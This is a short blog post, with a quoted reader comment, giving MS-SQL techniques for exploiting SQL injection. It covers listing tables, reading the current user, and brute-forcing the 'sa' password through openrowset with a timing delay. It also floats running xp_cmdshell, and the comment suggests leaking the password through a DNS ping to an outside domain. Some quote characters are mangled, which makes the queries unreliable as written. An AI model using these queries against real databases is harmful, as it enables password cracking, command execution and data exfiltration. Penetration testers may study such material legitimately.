Some information about MS-SQL server. You may find this info useful for exploiting SQL injection:
Finding Table Names:
Donot use:- Select name from sysobjects where xtype=’U’
Use:- SELECT table_name FROM INFORMATION_SCHEMA.TABLES
[WHERE table_schema = 'db_name']
[WHERE|AND table_name LIKE 'wild']
The first query will only return the table names which belong to current databases, however, the second query will return the the table names from other databases as well to which the current user has access to.
Getting Current User
Use:-Select SYSTEM_USER
Someone pointed this out that Select user will return the owner of the current database which may differ from the current user. So, system-user is alwayas correct to use.
Brute Forcing ’sa’ User’s Password
Use openrowset:-select null from openrowset(’sqloledb’,”;’sa’;’[password]‘,’select 1;waitfor delay ”0:0:10” ‘)
When the password supplied is correct the query ’select 1;waitfor delay ”0:0:10” ‘ will get executed. As i write this blog, i am just wondering if we can execute something like this:
select null from openrowset(’sqloledb’,”;’sa’;’[password]‘,’exec master..xp_cmshell ”ping my_host”’). I will confirm this sometime later.
12:15 pm on April 14th, 2007
Quoting:
I thought of a possible refinement to your idea. Maybe you could get
the query to send a DNS request containing the password.
Instead of:
exec master..xp_cmshell “ping myhost”
Do:
exec master..xp_cmshell “ping [password].notsosecure.com”
Listen for the DNS request on your nameserver. Outbound ping might be
blocked, but outbound DNS is less likely to be blocked.
Ref: http://pentestmonkey.net/blog/mssql-dns/
Just a thought.